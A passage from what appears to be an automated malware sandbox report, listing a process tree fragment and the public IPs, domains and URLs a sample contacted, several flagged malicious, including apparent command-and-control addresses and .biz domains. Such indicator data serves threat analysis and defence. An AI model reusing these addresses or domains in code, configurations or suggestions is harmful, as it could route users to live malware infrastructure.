information in the PEB, e.g. number of processors) 30->136 144 2 other signatures 30->144 96 youtube.com 142.250.181.78, 443, 49875, 49876 GOOGLEUS United States 32->96 98 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49879, 49892, 49896 GOOGLEUS United States 32->98 100 5 other IPs or domains 32->100 55 2 other processes 32->55 49 conhost.exe 34->49         started        51 conhost.exe 36->51         started        57 3 other processes 38->57 signatures10 process11 dnsIp12 102 192.168.2.4, 138, 443, 49723 unknown unknown 40->102 104 239.255.255.250 unknown Reserved 40->104 59 chrome.exe 40->59         started        62 chrome.exe 43->62         started        64 conhost.exe 45->64         started        66 conhost.exe 47->66         started        68 conhost.exe 53->68         started        70 conhost.exe 53->70         started        72 conhost.exe 53->72         started        process13 dnsIp14 110 www.google.com 142.250.181.68, 443, 49951 GOOGLEUS United States 59->110
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.48.1
 atten-supporse.biz United States
13335 CLOUDFLARENETUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 prod.ads.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.181.78
 youtube.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
atten-supporse.biz 104.21.48.1 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
www.google.com 142.250.181.68 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.181.78 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
js.monitor.azure.com unknown unknown
spocs.getpocket.com unknown unknown
detectportal.firefox.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    formy-spill.biz false
      		high
      https://atten-supporse.biz/api false
        		high
        atten-supporse.biz false
          		high
          dwell-exclaim.biz false
            		high